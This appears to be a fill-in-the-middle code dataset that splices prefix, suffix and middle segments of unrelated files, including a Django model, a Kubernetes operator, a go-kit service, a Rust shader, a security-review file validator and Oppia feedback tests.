refs = models.ManyToManyField(
'self',
verbose_name=_('Refs'),
editable=False,
db_index=True,
symmetrical=False
)
ip_address = models.CharField(
_('IP address'),
max_length=16,
editable=False,
db_index=True
)
session_id = models.CharField(
_('Session ID'),
max_length=32,
editable=False,
db_index=True
)
class Meta:
verbose_name = _('Post')
verbose_name_plural = _('Posts')
unique_together = ['thread', 'hid']
indexes = []
ordering = ['id']
def hid2hex(self):
return config.POST_FULL_HID_FORMAT.format(hid=self.hid)
def get_absolute_url(self):
thread_url = reverse( | 'thread_page',
kwargs={'board_hid': self.thread.board.hid, 'thread_hid': self.thread.hid}
)
post_url = '{thread_url}#{post_hid}'.format(
thread_url=thread_url,
post_hid=self.hid2hex()
)
return post_url | |
project.js | /* @flow */
'use strict'
/* ::
import type {RouteConfiguration} from '../types.js'
*/
const glob = require('glob')
const pify = require('pify')
const values = require('./values.js')
function listAPIs (
cwd /* : string */
) /* : Promise<Array<string>> */ {
return pify(glob)('./*/index.js', { cwd })
.then((matches) => matches.map((match) => match.split('/')[1]))
}
function | (
cwd /* : string */
) /* : Promise<Array<RouteConfiguration>> */ {
return listAPIs(cwd)
.then((apis) => apis.map((api) => ({
route: `/${api}`,
module: `./${api}/index.js`,
timeout: values.DEFAULT_TIMEOUT_SECONDS
})))
}
module.exports = {
listAPIs,
listRoutes
}
| listRoutes |
main.go | package main
import (
"context"
"flag"
"fmt"
"os"
"runtime"
// Import all Kubernetes client auth plugins (e.g. Azure, GCP, OIDC, etc.)
_ "k8s.io/client-go/plugin/pkg/client/auth"
"k8s.io/client-go/rest"
"github.com/kedacore/keda-olm-operator/pkg/apis"
"github.com/kedacore/keda-olm-operator/pkg/controller"
"github.com/kedacore/keda-olm-operator/version"
"github.com/operator-framework/operator-sdk/pkg/k8sutil"
kubemetrics "github.com/operator-framework/operator-sdk/pkg/kube-metrics"
"github.com/operator-framework/operator-sdk/pkg/leader"
"github.com/operator-framework/operator-sdk/pkg/log/zap"
"github.com/operator-framework/operator-sdk/pkg/metrics"
"github.com/operator-framework/operator-sdk/pkg/restmapper"
sdkVersion "github.com/operator-framework/operator-sdk/version"
"github.com/spf13/pflag"
v1 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/util/intstr"
"sigs.k8s.io/controller-runtime/pkg/client/config"
logf "sigs.k8s.io/controller-runtime/pkg/log"
"sigs.k8s.io/controller-runtime/pkg/manager"
"sigs.k8s.io/controller-runtime/pkg/manager/signals"
)
// Change below variables to serve metrics on different host or port.
var (
metricsHost = "0.0.0.0"
metricsPort int32 = 8383
operatorMetricsPort int32 = 8686
)
var log = logf.Log.WithName("cmd")
func printVersion() {
log.Info(fmt.Sprintf("Operator Version: %s", version.Version))
log.Info(fmt.Sprintf("Go Version: %s", runtime.Version()))
log.Info(fmt.Sprintf("Go OS/Arch: %s/%s", runtime.GOOS, runtime.GOARCH))
log.Info(fmt.Sprintf("Version of operator-sdk: %v", sdkVersion.Version))
}
func main() {
// Add the zap logger flag set to the CLI. The flag set must
// be added before calling pflag.Parse().
pflag.CommandLine.AddFlagSet(zap.FlagSet())
// Add flags registered by imported packages (e.g. glog and
// controller-runtime)
pflag.CommandLine.AddGoFlagSet(flag.CommandLine)
pflag.Parse()
// Use a zap logr.Logger implementation. If none of the zap
// flags are configured (or if the zap flag set is not being
// used), this defaults to a production zap logger.
//
// The logger instantiated here can be changed to any logger
// implementing the logr.Logger interface. This logger will
// be propagated through the whole operator, generating
// uniform and structured logs.
logf.SetLogger(zap.Logger())
printVersion()
namespace, err := k8sutil.GetWatchNamespace()
if err != nil {
log.Error(err, "Failed to get watch namespace")
os.Exit(1)
} | if err != nil {
log.Error(err, "")
os.Exit(1)
}
ctx := context.TODO()
// Become the leader before proceeding
err = leader.Become(ctx, "keda-olm-operator-lock")
if err != nil {
log.Error(err, "")
os.Exit(1)
}
// Create a new Cmd to provide shared dependencies and start components
mgr, err := manager.New(cfg, manager.Options{
Namespace: namespace,
MapperProvider: restmapper.NewDynamicRESTMapper,
MetricsBindAddress: fmt.Sprintf("%s:%d", metricsHost, metricsPort),
})
if err != nil {
log.Error(err, "")
os.Exit(1)
}
log.Info("Registering Components.")
// Setup Scheme for all resources
if err := apis.AddToScheme(mgr.GetScheme()); err != nil {
log.Error(err, "")
os.Exit(1)
}
// Setup all Controllers
if err := controller.AddToManager(mgr); err != nil {
log.Error(err, "")
os.Exit(1)
}
if err = serveCRMetrics(cfg); err != nil {
log.Info("Could not generate and serve custom resource metrics", "error", err.Error())
}
// Add to the below struct any other metrics ports you want to expose.
servicePorts := []v1.ServicePort{
{Port: metricsPort, Name: metrics.OperatorPortName, Protocol: v1.ProtocolTCP, TargetPort: intstr.IntOrString{Type: intstr.Int, IntVal: metricsPort}},
{Port: operatorMetricsPort, Name: metrics.CRPortName, Protocol: v1.ProtocolTCP, TargetPort: intstr.IntOrString{Type: intstr.Int, IntVal: operatorMetricsPort}},
}
// Create Service object to expose the metrics port(s).
service, err := metrics.CreateMetricsService(ctx, cfg, servicePorts)
if err != nil {
log.Info("Could not create metrics Service", "error", err.Error())
}
// CreateServiceMonitors will automatically create the prometheus-operator ServiceMonitor resources
// necessary to configure Prometheus to scrape metrics from this operator.
services := []*v1.Service{service}
_, err = metrics.CreateServiceMonitors(cfg, namespace, services)
if err != nil {
log.Info("Could not create ServiceMonitor object", "error", err.Error())
// If this operator is deployed to a cluster without the prometheus-operator running, it will return
// ErrServiceMonitorNotPresent, which can be used to safely skip ServiceMonitor creation.
if err == metrics.ErrServiceMonitorNotPresent {
log.Info("Install prometheus-operator in your cluster to create ServiceMonitor objects", "error", err.Error())
}
}
log.Info("Starting the Cmd.")
// Start the Cmd
if err := mgr.Start(signals.SetupSignalHandler()); err != nil {
log.Error(err, "Manager exited non-zero")
os.Exit(1)
}
}
// serveCRMetrics gets the Operator/CustomResource GVKs and generates metrics based on those types.
// It serves those metrics on "http://metricsHost:operatorMetricsPort".
func serveCRMetrics(cfg *rest.Config) error {
// Below function returns filtered operator/CustomResource specific GVKs.
// For more control override the below GVK list with your own custom logic.
filteredGVK, err := k8sutil.GetGVKsFromAddToScheme(apis.AddToScheme)
if err != nil {
return err
}
// Get the namespace the operator is currently deployed in.
operatorNs, err := k8sutil.GetOperatorNamespace()
if err != nil {
return err
}
// To generate metrics in other namespaces, add the values below.
ns := []string{operatorNs}
// Generate and serve custom resource specific metrics.
err = kubemetrics.GenerateAndServeCRMetrics(cfg, ns, filteredGVK, metricsHost, operatorMetricsPort)
if err != nil {
return err
}
return nil
} |
// Get a config to talk to the apiserver
cfg, err := config.GetConfig() |
service.go | package service
import (
"flag"
"fmt"
endpoint1 "github.com/go-kit/kit/endpoint"
log "github.com/go-kit/kit/log"
prometheus "github.com/go-kit/kit/metrics/prometheus"
lightsteptracergo "github.com/lightstep/lightstep-tracer-go"
group "github.com/oklog/oklog/pkg/group"
opentracinggo "github.com/opentracing/opentracing-go"
zipkingoopentracing "github.com/openzipkin/zipkin-go-opentracing"
endpoint "github.com/plutov/packagemain/13-go-kit-2/bugs/pkg/endpoint"
http "github.com/plutov/packagemain/13-go-kit-2/bugs/pkg/http"
service "github.com/plutov/packagemain/13-go-kit-2/bugs/pkg/service"
prometheus1 "github.com/prometheus/client_golang/prometheus"
promhttp "github.com/prometheus/client_golang/prometheus/promhttp"
"net"
http1 "net/http"
"os"
"os/signal"
appdash "sourcegraph.com/sourcegraph/appdash"
opentracing "sourcegraph.com/sourcegraph/appdash/opentracing"
"syscall"
)
var tracer opentracinggo.Tracer
var logger log.Logger
// Define our flags. Your service probably won't need to bind listeners for
// all* supported transports, but we do it here for demonstration purposes.
var fs = flag.NewFlagSet("bugs", flag.ExitOnError)
var debugAddr = fs.String("debug.addr", ":8080", "Debug and metrics listen address")
var httpAddr = fs.String("http-addr", ":8081", "HTTP listen address")
var grpcAddr = fs.String("grpc-addr", ":8082", "gRPC listen address")
var thriftAddr = fs.String("thrift-addr", ":8083", "Thrift listen address")
var thriftProtocol = fs.String("thrift-protocol", "binary", "binary, compact, json, simplejson")
var thriftBuffer = fs.Int("thrift-buffer", 0, "0 for unbuffered")
var thriftFramed = fs.Bool("thrift-framed", false, "true to enable framing")
var zipkinURL = fs.String("zipkin-url", "", "Enable Zipkin tracing via a collector URL e.g. http://localhost:9411/api/v1/spans")
var lightstepToken = fs.String("lightstep-token", "", "Enable LightStep tracing via a LightStep access token")
var appdashAddr = fs.String("appdash-addr", "", "Enable Appdash tracing via an Appdash server host:port")
func Run() {
fs.Parse(os.Args[1:])
// Create a single logger, which we'll use and give to other components.
logger = log.NewLogfmtLogger(os.Stderr)
logger = log.With(logger, "ts", log.DefaultTimestampUTC)
logger = log.With(logger, "caller", log.DefaultCaller)
// Determine which tracer to use. We'll pass the tracer to all the
// components that use it, as a dependency
if *zipkinURL != "" {
logger.Log("tracer", "Zipkin", "URL", *zipkinURL)
collector, err := zipkingoopentracing.NewHTTPCollector(*zipkinURL)
if err != nil {
logger.Log("err", err)
os.Exit(1)
}
defer collector.Close()
recorder := zipkingoopentracing.NewRecorder(collector, false, "localhost:80", "bugs")
tracer, err = zipkingoopentracing.NewTracer(recorder)
if err != nil {
logger.Log("err", err)
os.Exit(1)
}
} else if *lightstepToken != "" {
logger.Log("tracer", "LightStep")
tracer = lightsteptracergo.NewTracer(lightsteptracergo.Options{AccessToken: *lightstepToken})
defer lightsteptracergo.FlushLightStepTracer(tracer)
} else if *appdashAddr != "" {
logger.Log("tracer", "Appdash", "addr", *appdashAddr)
collector := appdash.NewRemoteCollector(*appdashAddr)
tracer = opentracing.NewTracer(collector)
defer collector.Close()
} else {
logger.Log("tracer", "none")
tracer = opentracinggo.GlobalTracer()
}
svc := service.New(getServiceMiddleware(logger))
eps := endpoint.New(svc, getEndpointMiddleware(logger))
g := createService(eps)
initMetricsEndpoint(g)
initCancelInterrupt(g)
logger.Log("exit", g.Run())
}
func initHttpHandler(endpoints endpoint.Endpoints, g *group.Group) {
options := defaultHttpOptions(logger, tracer)
// Add your http options here
httpHandler := http.NewHTTPHandler(endpoints, options)
httpListener, err := net.Listen("tcp", *httpAddr)
if err != nil {
logger.Log("transport", "HTTP", "during", "Listen", "err", err)
}
g.Add(func() error {
logger.Log("transport", "HTTP", "addr", *httpAddr)
return http1.Serve(httpListener, httpHandler)
}, func(error) {
httpListener.Close()
})
}
func getServiceMiddleware(logger log.Logger) (mw []service.Middleware) {
mw = []service.Middleware{}
mw = addDefaultServiceMiddleware(logger, mw)
// Append your middleware here
return
}
func getEndpointMiddleware(logger log.Logger) (mw map[string][]endpoint1.Middleware) {
mw = map[string][]endpoint1.Middleware{}
duration := prometheus.NewSummaryFrom(prometheus1.SummaryOpts{
Help: "Request duration in seconds.",
Name: "request_duration_seconds",
Namespace: "example",
Subsystem: "bugs",
}, []string{"method", "success"})
addDefaultEndpointMiddleware(logger, duration, mw)
// Add you endpoint middleware here
return
}
func initMetricsEndpoint(g *group.Group) |
func initCancelInterrupt(g *group.Group) {
cancelInterrupt := make(chan struct{})
g.Add(func() error {
c := make(chan os.Signal, 1)
signal.Notify(c, syscall.SIGINT, syscall.SIGTERM)
select {
case sig := <-c:
return fmt.Errorf("received signal %s", sig)
case <-cancelInterrupt:
return nil
}
}, func(error) {
close(cancelInterrupt)
})
}
| {
http1.DefaultServeMux.Handle("/metrics", promhttp.Handler())
debugListener, err := net.Listen("tcp", *debugAddr)
if err != nil {
logger.Log("transport", "debug/HTTP", "during", "Listen", "err", err)
}
g.Add(func() error {
logger.Log("transport", "debug/HTTP", "addr", *debugAddr)
return http1.Serve(debugListener, http1.DefaultServeMux)
}, func(error) {
debugListener.Close()
})
} |
spot.rs | use crate::renderer::framework::{
error::FrameworkError,
gpu_program::{GpuProgram, UniformLocation},
state::PipelineState,
};
pub struct | {
pub program: GpuProgram,
pub wvp_matrix: UniformLocation,
pub depth_sampler: UniformLocation,
pub color_sampler: UniformLocation,
pub normal_sampler: UniformLocation,
pub spot_shadow_texture: UniformLocation,
pub cookie_enabled: UniformLocation,
pub cookie_texture: UniformLocation,
pub light_view_proj_matrix: UniformLocation,
pub shadows_enabled: UniformLocation,
pub soft_shadows: UniformLocation,
pub shadow_map_inv_size: UniformLocation,
pub light_position: UniformLocation,
pub light_radius: UniformLocation,
pub light_color: UniformLocation,
pub light_direction: UniformLocation,
pub half_hotspot_cone_angle_cos: UniformLocation,
pub half_cone_angle_cos: UniformLocation,
pub inv_view_proj_matrix: UniformLocation,
pub camera_position: UniformLocation,
pub shadow_bias: UniformLocation,
pub light_intensity: UniformLocation,
}
impl SpotLightShader {
pub fn new(state: &mut PipelineState) -> Result<Self, FrameworkError> {
let fragment_source = include_str!("../shaders/deferred_spot_light_fs.glsl");
let vertex_source = include_str!("../shaders/deferred_light_vs.glsl");
let program =
GpuProgram::from_source(state, "DeferredLightShader", vertex_source, fragment_source)?;
Ok(Self {
wvp_matrix: program.uniform_location(state, "worldViewProjection")?,
depth_sampler: program.uniform_location(state, "depthTexture")?,
color_sampler: program.uniform_location(state, "colorTexture")?,
normal_sampler: program.uniform_location(state, "normalTexture")?,
spot_shadow_texture: program.uniform_location(state, "spotShadowTexture")?,
cookie_enabled: program.uniform_location(state, "cookieEnabled")?,
cookie_texture: program.uniform_location(state, "cookieTexture")?,
light_view_proj_matrix: program.uniform_location(state, "lightViewProjMatrix")?,
shadows_enabled: program.uniform_location(state, "shadowsEnabled")?,
soft_shadows: program.uniform_location(state, "softShadows")?,
shadow_map_inv_size: program.uniform_location(state, "shadowMapInvSize")?,
light_position: program.uniform_location(state, "lightPos")?,
light_radius: program.uniform_location(state, "lightRadius")?,
light_color: program.uniform_location(state, "lightColor")?,
light_direction: program.uniform_location(state, "lightDirection")?,
half_hotspot_cone_angle_cos: program
.uniform_location(state, "halfHotspotConeAngleCos")?,
half_cone_angle_cos: program.uniform_location(state, "halfConeAngleCos")?,
inv_view_proj_matrix: program.uniform_location(state, "invViewProj")?,
camera_position: program.uniform_location(state, "cameraPosition")?,
shadow_bias: program.uniform_location(state, "shadowBias")?,
light_intensity: program.uniform_location(state, "lightIntensity")?,
program,
})
}
}
| SpotLightShader |
validate.py | #!env python
import sys
from typing import List
import os
import re
from better_profanity import profanity
class SecurityReviewValidator:
|
if __name__ == '__main__':
validator = SecurityReviewValidator()
if len(sys.argv) == 2:
if os.path.isdir(sys.argv[1]):
results = validator.validate_path(path)
else:
results = validator.validate_file(path)
else:
results = validator.validate_path('reviews')
if results:
for result in results:
print(f'Error: {result}')
sys.exit(1)
else:
print("OK")
sys.exit(0)
| results = None
def __init__(self):
pass
def validate_path(self, path: str) -> List[str]:
results = []
for root, _, files in os.walk(path, topdown=False):
for name in files:
filename = os.path.join(root, name)
for result in self.validate_file(filename):
results.append(f"{filename}: {result}")
return results
def validate_file(self, filename: str) -> List[str]:
self.results = []
if not os.path.isfile(filename):
self.results.append('File does not exist.')
return self.results
with open(filename, 'r') as f:
if not f.readable():
self.results.append('Unable to read from file.')
return self.results
content = f.read()
lines = content.splitlines()
self.__check_profanity(content)
self.__check_required_headers(lines)
self.__check_metadata(lines)
return self.results
def __check_profanity(self, content):
if profanity.contains_profanity(content):
self.results.append("Contains profanity.")
return
def __check_required_headers(self, lines):
sections = list(map(str.strip, filter(lambda s: s.startswith('### '), lines)))
for header in ['Metadata', 'Summary', 'Details',
'External References', 'Methodology']:
if f'### {header}' not in sections:
self.results.append(f'Missing header: {header}')
def __check_metadata(self, lines):
metadata_content = []
in_metadata = False
for line in lines:
line = line.strip()
if line == '### Metadata':
in_metadata = True
elif line.startswith('### Summary'):
in_metadata = False
break
elif in_metadata:
metadata_content.append(line)
metadata = {}
for line in metadata_content:
match = re.match(r'^([^:]+):\s*(.+)$', line)
if match:
key = match.group(1).strip().lower()
value = match.group(2).strip()
if key not in metadata:
metadata[key] = []
metadata[key].append(value)
if 'package_url' not in metadata:
self.results.append("Missing Package URL.")
if 'author' not in metadata:
self.results.append("Missing author.")
if 'review_date' not in metadata:
self.results.append("Missing review date.")
if 'recommendation' not in metadata:
self.results.append("Missing recommendation.")
if len(metadata.get('recommendation')) > 1:
self.results.append("Too many recommendations, only one is allowed.")
recommendation = metadata.get('recommendation')[0]
if recommendation not in ['safe', 'unsafe', 'context-dependent', 'no-opinion']:
self.results.append("Invalid recommendation, must be either 'safe', 'unsafe', 'context-dependent', or 'no-opinion'") |
main.rs | struct Solution {}
impl Solution {
pub fn largest_rectangle_area(mut heights: Vec<i32>) -> i32 {
// solution 1
// let mut max_area = 0;
//
// for i in 0..heights.len() {
// let mut min_height = i32::max_value();
//
// for j in i..heights.len() {
// min_height = min_height.min(heights[j]);
// max_area = max_area.max(min_height * (j - i + 1) as i32);
// }
// }
//
// max_area
// solution 2
let mut stack = vec![];
let mut fixed_heights = vec![0];
let mut max_area = 0;
// fixed_heights = [0] + heights + [0]
// first 0 is index-guard,
// last 0 is using for triggering calculation if
// last few elements are monotonically increasing
fixed_heights.append(&mut heights);
fixed_heights.push(0);
for i in 0..fixed_heights.len() {
while !stack.is_empty() && fixed_heights[stack[stack.len() - 1]] > fixed_heights[i] {
let last = stack.pop().unwrap();
let width = (i - stack[stack.len() - 1] - 1) as i32;
max_area = max_area.max(width * fixed_heights[last]);
}
stack.push(i);
} |
max_area
}
}
fn main() {
assert_eq!(10, Solution::largest_rectangle_area(vec![2, 1, 5, 6, 2, 3, 4, 1, 2]));
assert_eq!(1, Solution::largest_rectangle_area(vec![1]));
assert_eq!(0, Solution::largest_rectangle_area(vec![]));
} | |
app.routes.tsx | import React from 'react';
import { createStackNavigator } from '@react-navigation/stack';
import { theme } from '../global/styles/theme';
import { Home } from '../screens/Home';
import { AppointmentDetails } from '../screens/AppointmentDetails';
import { AppointmentCreate } from '../screens/AppointmentCreate';
const { Navigator, Screen } = createStackNavigator();
export function | () {
return (
<Navigator
headerMode="none"
screenOptions={{
cardStyle: {
backgroundColor: theme.colors.secondary100
}
}}
>
<Screen
name="Home"
component={Home}
/>
<Screen
name="AppointmentDetails"
component={AppointmentDetails}
/>
<Screen
name="AppointmentCreate"
component={AppointmentCreate}
/>
</Navigator>
);
} | AppRoutes |
feedback_services_test.py | # Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for feedback-related services."""
import json
from core.domain import email_services
from core.domain import event_services
from core.domain import feedback_domain
from core.domain import feedback_jobs_continuous
from core.domain import feedback_services
from core.domain import subscription_services
from core.domain import user_services
from core.platform import models
from core.tests import test_utils
import feconf
(feedback_models, email_models) = models.Registry.import_models([
models.NAMES.feedback, models.NAMES.email])
taskqueue_services = models.Registry.import_taskqueue_services()
class FeedbackServicesUnitTests(test_utils.GenericTestBase):
"""Test functions in feedback_services."""
def test_feedback_ids(self):
"""Test various conventions for thread and message ids."""
exp_id = '0'
feedback_services.create_thread(
'exploration', exp_id, None, 'a subject', 'some text')
threadlist = feedback_services.get_all_threads(
'exploration', exp_id, False)
self.assertEqual(len(threadlist), 1)
thread_id = threadlist[0].id
messages = feedback_services.get_messages(thread_id)
self.assertEqual(len(messages), 1)
message_id = messages[0].message_id
self.assertTrue(isinstance(message_id, int))
threadlist = feedback_services.get_all_threads(
'exploration', exp_id, False)
self.assertEqual(len(threadlist), 1)
thread_id = threadlist[0].id
messages = feedback_services.get_messages(thread_id)
self.assertEqual(len(messages), 1)
message_id = messages[0].message_id
self.assertTrue(isinstance(message_id, int))
# Retrieve the message instance from the storage layer.
datastore_id = feedback_models.GeneralFeedbackMessageModel.get_messages(
thread_id)[0].id
# The message id should be prefixed with the thread id and a full
# stop, followed by the message id.
self.assertEqual(datastore_id, '%s.%s' % (thread_id, message_id))
def test_create_message_fails_if_invalid_thread_id(self):
with self.assertRaises(
feedback_models.GeneralFeedbackMessageModel.EntityNotFoundError
):
feedback_services.create_message(
'invalid_thread_id', 'user_id', None, None, 'Hello')
def test_status_of_newly_created_thread_is_open(self):
exp_id = '0'
feedback_services.create_thread(
'exploration', exp_id, None, 'a subject', 'some text')
threadlist = feedback_services.get_all_threads(
'exploration', exp_id, False)
thread_status = threadlist[0].status
self.assertEqual(thread_status, feedback_models.STATUS_CHOICES_OPEN)
def test_get_exp_id_from_thread_id(self):
thread_id = 'exploration.exp1.1234'
self.assertEqual(
feedback_services.get_exp_id_from_thread_id(thread_id), 'exp1')
class MockFeedbackAnalyticsAggregator(
feedback_jobs_continuous.FeedbackAnalyticsAggregator):
"""A modified FeedbackAnalyticsAggregator that does not start a new batch
job when the previous one has finished.
"""
@classmethod
def _get_batch_job_manager_class(cls):
return MockFeedbackAnalyticsMRJobManager
@classmethod
def _kickoff_batch_job_after_previous_one_ends(cls):
pass
class MockFeedbackAnalyticsMRJobManager(
feedback_jobs_continuous.FeedbackAnalyticsMRJobManager):
@classmethod
def _get_continuous_computation_class(cls):
return MockFeedbackAnalyticsAggregator
class FeedbackThreadUnitTests(test_utils.GenericTestBase):
EXP_ID_1 = 'eid1'
EXP_ID_2 = 'eid2'
EXP_ID_3 = 'eid3'
THREAD_ID = 'thread_id'
EXPECTED_THREAD_DICT = {
'status': u'open',
'summary': None,
'original_author_username': None,
'subject': u'a subject'
}
EXPECTED_THREAD_DICT_VIEWER = {
'status': u'open',
'summary': None,
'original_author_username': None,
'subject': u'a subject second'
}
USER_EMAIL = '[email protected]'
USER_USERNAME = 'user'
def setUp(self):
super(FeedbackThreadUnitTests, self).setUp()
self.signup(self.VIEWER_EMAIL, self.VIEWER_USERNAME)
self.signup(self.USER_EMAIL, self.USER_USERNAME)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.user_id = self.get_user_id_from_email(self.USER_EMAIL)
self.viewer_id = self.get_user_id_from_email(self.VIEWER_EMAIL)
self.save_new_valid_exploration(
self.EXP_ID_1, self.owner_id, title='Bridges in England',
category='Architecture', language_code='en')
self.save_new_valid_exploration(
self.EXP_ID_2, self.owner_id, title='Sillat Suomi',
category='Architecture', language_code='fi')
self.save_new_valid_exploration(
self.EXP_ID_3, self.owner_id, title='Leaning tower of Pisa',
category='Architecture', language_code='fi')
def _get_all_messages_read(self, user_id, thread_id):
feedback_thread_user_model = (
feedback_models.GeneralFeedbackThreadUserModel.get(
user_id, thread_id))
return (
feedback_thread_user_model.message_ids_read_by_user if
feedback_thread_user_model else [])
def _run_computation(self):
MockFeedbackAnalyticsAggregator.start_computation()
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_CONTINUOUS_JOBS), 1)
self.process_and_flush_pending_tasks()
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_CONTINUOUS_JOBS), 0)
self.process_and_flush_pending_tasks()
def test_get_threads_single_exploration(self):
threads = feedback_services.get_threads('exploration', self.EXP_ID_1)
self.assertEqual(len(threads), 0)
feedback_services.create_thread(
'exploration', self.EXP_ID_1, None,
self.EXPECTED_THREAD_DICT['subject'], 'not used here')
threads = feedback_services.get_threads('exploration', self.EXP_ID_1)
self.assertEqual(1, len(threads))
self.assertDictContainsSubset(
self.EXPECTED_THREAD_DICT, threads[0].to_dict())
def test_get_all_threads(self):
# Create an anonymous feedback thread.
feedback_services.create_thread(
'exploration', self.EXP_ID_1, None,
self.EXPECTED_THREAD_DICT['subject'], 'not used here')
threads = feedback_services.get_all_threads(
'exploration', self.EXP_ID_1, False)
self.assertEqual(1, len(threads))
self.assertDictContainsSubset(
self.EXPECTED_THREAD_DICT, threads[0].to_dict())
self.EXPECTED_THREAD_DICT_VIEWER['original_author_username'] = (
self.VIEWER_USERNAME)
# Viewer creates feedback thread.
feedback_services.create_thread(
'exploration', self.EXP_ID_1, self.viewer_id,
self.EXPECTED_THREAD_DICT_VIEWER['subject'], 'not used here')
threads = feedback_services.get_all_threads(
'exploration', self.EXP_ID_1, False)
self.assertEqual(2, len(threads))
self.assertDictContainsSubset(
self.EXPECTED_THREAD_DICT_VIEWER, threads[0].to_dict())
def test_get_total_open_threads_before_job_run(self):
self.assertEqual(feedback_services.get_total_open_threads(
feedback_services.get_thread_analytics_multi([self.EXP_ID_1])), 0)
feedback_services.create_thread(
'exploration', self.EXP_ID_1, None,
self.EXPECTED_THREAD_DICT['subject'], 'not used here')
threads = feedback_services.get_all_threads(
'exploration', self.EXP_ID_1, False)
self.assertEqual(1, len(threads))
self.assertEqual(feedback_services.get_total_open_threads(
feedback_services.get_thread_analytics_multi(
[self.EXP_ID_1])), 0)
def test_get_total_open_threads_for_single_exploration(self):
feedback_services.create_thread(
'exploration', self.EXP_ID_1, None,
self.EXPECTED_THREAD_DICT['subject'], 'not used here')
threads = feedback_services.get_all_threads(
'exploration', self.EXP_ID_1, False)
self.assertEqual(1, len(threads))
self._run_computation()
self.assertEqual(feedback_services.get_total_open_threads(
feedback_services.get_thread_analytics_multi(
[self.EXP_ID_1])), 1)
def test_get_total_open_threads_for_multiple_explorations(self):
feedback_services.create_thread(
'exploration', self.EXP_ID_1, None,
self.EXPECTED_THREAD_DICT['subject'], 'not used here')
feedback_services.create_thread(
'exploration', self.EXP_ID_2, None,
self.EXPECTED_THREAD_DICT['subject'], 'not used here')
threads_exp_1 = feedback_services.get_all_threads(
'exploration', self.EXP_ID_1, False)
self.assertEqual(1, len(threads_exp_1))
threads_exp_2 = feedback_services.get_all_threads(
'exploration', self.EXP_ID_2, False)
self.assertEqual(1, len(threads_exp_2))
def _close_thread(thread_id):
thread = feedback_models.GeneralFeedbackThreadModel.get_by_id(
thread_id)
thread.status = feedback_models.STATUS_CHOICES_FIXED
thread.put()
_close_thread(threads_exp_1[0].id)
self.assertEqual(len(feedback_services.get_closed_threads(
'exploration', self.EXP_ID_1, False)), 1)
self._run_computation()
self.assertEqual(feedback_services.get_total_open_threads(
feedback_services.get_thread_analytics_multi(
[self.EXP_ID_1, self.EXP_ID_2])), 1)
def test_get_thread_summaries(self):
feedback_services.create_thread(
'exploration', self.EXP_ID_1, self.user_id,
self.EXPECTED_THREAD_DICT['subject'], 'not used here')
feedback_services.create_thread(
'exploration', self.EXP_ID_2, self.user_id,
self.EXPECTED_THREAD_DICT['subject'], 'not used here')
# The message count parameter is missing for this thread. The thread
# summaries function should account for this and function
# flawlessly.
thread_3 = feedback_models.GeneralFeedbackThreadModel(
id='exploration.' + self.EXP_ID_3 + '.' + self.THREAD_ID,
entity_type='exploration', entity_id=self.EXP_ID_3,
original_author_id=self.user_id, subject='Feedback',
status=feedback_models.STATUS_CHOICES_OPEN, has_suggestion=False)
thread_3.put()
feedback_services.create_message(
'exploration.' + self.EXP_ID_3 + '.' + self.THREAD_ID,
self.user_id, None, None, 'not used here')
thread_ids = subscription_services.get_all_threads_subscribed_to(
self.user_id)
thread_ids.append('exploration.' + self.EXP_ID_3 + '.' + self.THREAD_ID)
thread_summaries, number_of_unread_threads = (
feedback_services.get_thread_summaries(
self.user_id, thread_ids))
exploration_titles = (
['Bridges in England', 'Sillat Suomi', 'Leaning tower of Pisa'])
# Fetch the threads.
threads = []
threads.append(feedback_services.get_thread(thread_ids[0]))
threads.append(feedback_services.get_thread(thread_ids[1]))
threads.append(feedback_services.get_thread(
'exploration.' + self.EXP_ID_3 + '.' + self.THREAD_ID))
# Check if the number of unread messages match.
self.assertEqual(number_of_unread_threads, 0)
for index, thread in enumerate(threads):
thread_summary = {
'status': thread.status,
'original_author_id': thread.original_author_id,
'last_updated': thread_summaries[index]['last_updated'],
'last_message_text': 'not used here',
'total_message_count': 1,
'last_message_read': True,
'second_last_message_read': None,
'author_last_message': user_services.get_username(
self.user_id),
'author_second_last_message': None,
'exploration_title': exploration_titles[index]
}
# Check if the summaries match.
self.assertDictContainsSubset(
thread_summary, thread_summaries[index])
feedback_services.create_message(
threads[0].id, self.owner_id, None, None, 'editor message')
_, number_of_unread_threads = (
feedback_services.get_thread_summaries(self.user_id, thread_ids))
# Check if the number of unread messages is equal to 1.
self.assertEqual(number_of_unread_threads, 1)
def test_update_messages_read_by_the_user(self):
feedback_services.create_thread(
'exploration', self.EXP_ID_1, self.user_id,
self.EXPECTED_THREAD_DICT['subject'], 'not used here')
threads = feedback_services.get_all_threads(
'exploration', self.EXP_ID_1, False)
thread_id = threads[0].id
messages = feedback_services.get_messages(thread_id)
message_ids = [message.message_id for message in messages]
# The viewer has not read in messages yet.
self.assertEqual(self._get_all_messages_read(
self.viewer_id, thread_id), [])
feedback_services.update_messages_read_by_the_user(
self.viewer_id, thread_id, message_ids)
# Check if the message is added to the read section of the viewer.
self.assertEqual(self._get_all_messages_read(
self.viewer_id, thread_id), message_ids)
def test_only_exploration_threads_trigger_events(self):
exp_id = 'eid'
self.save_new_valid_exploration(exp_id, 'owner')
event_handler_call_counter_exploration = test_utils.CallCounter(
event_services.FeedbackThreadCreatedEventHandler.record)
with self.swap(
event_services.FeedbackThreadCreatedEventHandler, 'record',
event_handler_call_counter_exploration):
feedback_services.create_thread(
feconf.ENTITY_TYPE_EXPLORATION, exp_id,
None, 'a subject', 'some text')
self.assertEqual(
event_handler_call_counter_exploration.times_called, 1)
event_handler_call_counter_non_exploration = (
test_utils.CallCounter(
event_services.FeedbackThreadCreatedEventHandler.record))
with self.swap(
event_services.FeedbackThreadCreatedEventHandler, 'record',
event_handler_call_counter_non_exploration):
feedback_services.create_thread(
'topic', 'topic_id', None, 'a subject',
'some text')
